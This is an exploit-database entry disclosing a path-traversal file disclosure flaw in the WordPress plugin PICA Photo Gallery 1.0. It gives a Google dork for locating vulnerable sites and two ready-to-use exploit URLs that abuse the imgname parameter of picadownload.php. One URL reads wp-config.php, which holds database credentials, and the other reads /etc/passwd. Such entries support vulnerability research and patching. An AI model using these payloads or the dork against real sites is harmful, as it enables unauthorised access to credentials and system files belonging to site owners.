WordPress Plugin PICA Photo Gallery 1.0 - Remote File Disclosure

EDB-ID:

19016

CVE:



Platform:

PHP

Published:

2012-06-08

##################################################
# Description : Wordpress Plugins - PICA Photo Gallery Remote File 
Disclosure Vulnerability
# Version : 1.0
# Link : http://wordpress.org/extend/plugins/pica-photo-gallery/
# Plugins : http://downloads.wordpress.org/plugin/pica-photo-gallery.zip
# Date : 30-05-2012
# Google Dork : inurl:/wp-content/plugins/pica-photo-gallery/
# Author : Sammy FORGIT - sam at opensyscom dot fr - 
http://www.opensyscom.fr
##################################################


Exploit :

http://www.exemple.com/wordpress/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php

http://www.exemple.com/wordpress/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../../../../../etc/passwd